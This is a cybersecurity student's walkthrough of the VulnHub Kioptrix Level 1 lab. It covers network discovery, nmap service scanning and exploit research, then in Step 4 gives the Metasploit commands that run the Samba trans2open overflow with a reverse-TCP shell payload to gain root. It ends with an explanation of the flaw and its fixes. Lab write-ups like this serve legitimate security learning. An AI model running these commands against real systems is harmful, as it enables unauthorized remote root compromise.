Kioptrix Level 1 — VulnHub Writeup

Overview

Goal: Gain root access Result Rooted via Samba trans2open buffer overflow

Environment Setup

• Attack Machine: Kali Linux 2025.3 (VirtualBox)
• Target Machine: Kioptrix Level 1 (VirtualBox)
• Network: VirtualBox Host-Only Adapter (isolated lab environment)

Step 1: Reconnaissance — Finding the Target

With both VMs running on the same Host-Only network, I used arp-scan to discover the target IP:

sudo arp-scan -l

sudo arp-scan -l

Result: Kioptrix was running at 192.168.1.104

Step 2: Enumeration — Service and Version Scanning

I ran an nmap scan to identify open ports and service versions:

nmap -sV 192.168.1.104

nmap -sV 192.168.1.104

Results:

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open   http        Apache httpd 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp   open   rpcbind     2 (RPC #100000)
139/tcp   open   netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open   ssl/https   Apache/1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open   status      1 (RPC #100024)

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open   http        Apache httpd 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp   open   rpcbind     2 (RPC #100000)
139/tcp   open   netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open   ssl/https   Apache/1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open   status      1 (RPC #100024)

Key findings:

• Apache 1.3.20 with mod_ssl 2.8.4 — known vulnerable to OpenFuck exploit
• Samba running on port 139 — known vulnerable to trans2open buffer overflow
• OpenSSH 2.9p2 — very old version

Step 3: Vulnerability Research

I used searchsploit to look up known exploits for the identified services:

searchsploit mod_ssl 2.8
searchsploit samba 2.2

searchsploit mod_ssl 2.8
searchsploit samba 2.2

mod_ssl results:

• Apache mod_ssl < 2.8.7 OpenSSL — 'OpenFuck' (Remote exploit)

Samba results (via Metasploit):

search trans2open

search trans2open

• exploit/linux/samba/trans2open — Samba trans2open Overflow (Linux x86) — Rank: Great

I chose the Samba trans2open route via Metasploit as the primary attack path due to its "great" reliability rating.

Step 4: Exploitation Samba trans2open

What is this vulnerability?

The Samba trans2open vulnerability is a buffer overflow in Samba versions 2.0.x through 2.2.x. By sending a malformed trans2open request, an attacker can overflow a buffer and overwrite the return address, redirecting code execution to a malicious payload. Since Samba was running as root, successful exploitation gives immediate root access.

Exploitation steps:

msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.1.104
set payload linux/x86/shell/reverse_tcp
run

msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.1.104
set payload linux/x86/shell/reverse_tcp
run

Result:

[*] Command shell session 1 opened (192.168.1.244:4444 → 192.168.1.104:32769)

[*] Command shell session 1 opened (192.168.1.244:4444 → 192.168.1.104:32769)

Four shell sessions opened successfully.

Step 5: Post-Exploitation — Confirming Root

Inside the shell session I ran:

whoami
root
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

whoami
root
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

Root access confirmed on Linux kernel 2.4.7, a Red Hat system from 2001.

Summary

Phase Tool Used Finding Discovery arp-scan Target at 192.168.1.104 Enumeration nmap -sV Apache 1.3.20, Samba, OpenSSH 2.9p2 Research searchsploit, msfconsole trans2open buffer overflow Exploitation Metasploit Shell session opened Post-Exploitation whoami, id, uname Confirmed root

What I Learned

The vulnerability: Samba's trans2open function did not properly validate the size of incoming data before copying it into a fixed-size buffer. This allowed an attacker to overflow the buffer and overwrite the stack, redirecting execution to arbitrary shellcode.

Why it worked: The service was running as root, meaning any code we injected ran with full system privileges. There were no modern protections (ASLR, DEP, stack canaries) present on this 2001-era system.

How it would be patched: Update Samba to a version beyond 2.2.x. Apply the principle of least privilege; services should not run as root unless absolutely necessary. Enable modern memory protections.

Key takeaway: Version enumeration is everything. The moment nmap returned Samba on port 139 with no version number, the next step was clear , research that service. Old software versions are low-hanging fruit in real engagements.

All testing was performed in an isolated lab environment.

Mohamed Khalil | Cybersecurity Student | East Tennessee State University| www.linkedin.com/in/khalilm1| https://github.com/asimisbest